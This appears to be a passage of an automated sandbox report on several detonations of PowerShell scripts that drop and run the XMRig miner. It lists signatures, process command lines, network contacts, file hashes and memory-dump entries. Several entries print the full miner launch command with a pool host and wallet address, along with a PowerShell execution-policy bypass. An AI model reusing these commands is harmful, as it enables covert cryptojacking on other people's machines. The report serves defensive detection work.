N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 106.246.116.51.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/3384-2-0x00007FFD2D573000-0x00007FFD2D574000-memory.dmp

memory/3384-5-0x000001B470DF0000-0x000001B470E12000-memory.dmp

memory/3384-6-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

memory/3384-9-0x000001B470FA0000-0x000001B471016000-memory.dmp

memory/3384-10-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mdo3hg15.2o3.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3384-25-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

memory/3384-48-0x000001B471120000-0x000001B471132000-memory.dmp

memory/3384-61-0x000001B470F80000-0x000001B470F8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4176-90-0x000001D88AB40000-0x000001D88AB60000-memory.dmp

memory/3384-91-0x00007FFD2D573000-0x00007FFD2D574000-memory.dmp

memory/3384-92-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

memory/4176-93-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/3384-94-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

memory/3384-96-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

memory/4176-95-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-97-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-98-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-99-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-100-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-101-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-102-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-103-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-104-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-105-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-106-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-107-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-108-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-109-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-110-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-111-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-112-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-113-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-114-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-115-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-116-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-117-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-118-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-119-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-120-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-121-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-122-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-123-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-124-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-125-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-126-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-127-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-128-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-129-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-130-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-131-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-132-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-133-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-134-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-135-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-136-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-137-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-138-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-139-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-140-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-141-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-142-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-143-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-144-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-145-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-146-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-147-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-148-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-149-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-150-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-151-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-152-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-153-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-154-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-155-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-156-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-157-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:46

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 215.143.182.52.in-addr.arpa udp

Files

memory/4344-0-0x00007FFEE9B43000-0x00007FFEE9B45000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ahpjq2s.z2h.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4344-11-0x00007FFEE9B40000-0x00007FFEEA601000-memory.dmp

memory/4344-10-0x0000016D37AB0000-0x0000016D37AD2000-memory.dmp

memory/4344-12-0x00007FFEE9B40000-0x00007FFEEA601000-memory.dmp

memory/4344-14-0x00007FFEE9B40000-0x00007FFEEA601000-memory.dmp

memory/4344-15-0x0000016D50050000-0x0000016D50062000-memory.dmp

memory/4344-16-0x0000016D37A80000-0x0000016D37A8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4180-47-0x000001B4C1900000-0x000001B4C1920000-memory.dmp

memory/4180-48-0x000001B4C1A50000-0x000001B4C1A70000-memory.dmp

memory/4180-49-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-51-0x000001B4C1A70000-0x000001B4C1A90000-memory.dmp

memory/4180-52-0x000001B4C1A90000-0x000001B4C1AB0000-memory.dmp

memory/4344-50-0x00007FFEE9B43000-0x00007FFEE9B45000-memory.dmp

memory/4344-54-0x00007FFEE9B40000-0x00007FFEEA601000-memory.dmp

memory/4180-53-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4344-56-0x00007FFEE9B40000-0x00007FFEEA601000-memory.dmp

memory/4180-55-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-57-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-58-0x000001B4C1A70000-0x000001B4C1A90000-memory.dmp

memory/4180-59-0x000001B4C1A90000-0x000001B4C1AB0000-memory.dmp

memory/4180-60-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-61-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-62-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-63-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-64-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-65-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-66-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-67-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-68-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-69-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-70-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-71-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-72-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-73-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-74-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-75-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-76-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-77-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-78-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-79-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-80-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-81-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-82-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-83-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-84-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-85-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-86-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-87-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-88-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-89-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-90-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-91-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-92-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-93-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-94-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-95-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-96-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-97-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-98-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-99-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-100-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-101-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-102-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-103-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-104-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-105-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-106-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-107-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-108-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-109-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-110-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-111-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-112-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-113-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-114-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-115-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-116-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-117-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

memory/4180-118-0x00007FF7DCF60000-0x00007FF7DDB93000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:50

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp

Files

memory/3812-0-0x00007FFB1E913000-0x00007FFB1E915000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g54m21hm.had.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3812-10-0x000002452B470000-0x000002452B492000-memory.dmp

memory/3812-11-0x00007FFB1E910000-0x00007FFB1F3D1000-memory.dmp

memory/3812-12-0x00007FFB1E910000-0x00007FFB1F3D1000-memory.dmp

memory/3812-14-0x00007FFB1E910000-0x00007FFB1F3D1000-memory.dmp

memory/3812-15-0x000002452B870000-0x000002452B882000-memory.dmp

memory/3812-16-0x000002452B640000-0x000002452B64A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3028-47-0x000002A17D780000-0x000002A17D7A0000-memory.dmp

memory/3028-48-0x000002A17F080000-0x000002A17F0A0000-memory.dmp

memory/3028-49-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3812-50-0x00007FFB1E913000-0x00007FFB1E915000-memory.dmp

memory/3028-51-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3812-52-0x00007FFB1E910000-0x00007FFB1F3D1000-memory.dmp

memory/3028-54-0x000002A17F0C0000-0x000002A17F0E0000-memory.dmp

memory/3028-53-0x000002A17F0A0000-0x000002A17F0C0000-memory.dmp

memory/3028-55-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3812-56-0x00007FFB1E910000-0x00007FFB1F3D1000-memory.dmp

memory/3028-57-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-59-0x000002A17F0C0000-0x000002A17F0E0000-memory.dmp

memory/3028-58-0x000002A17F0A0000-0x000002A17F0C0000-memory.dmp

memory/3028-60-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-61-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-62-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-63-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-64-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-65-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-66-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-67-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-68-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-69-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-70-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-71-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-72-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

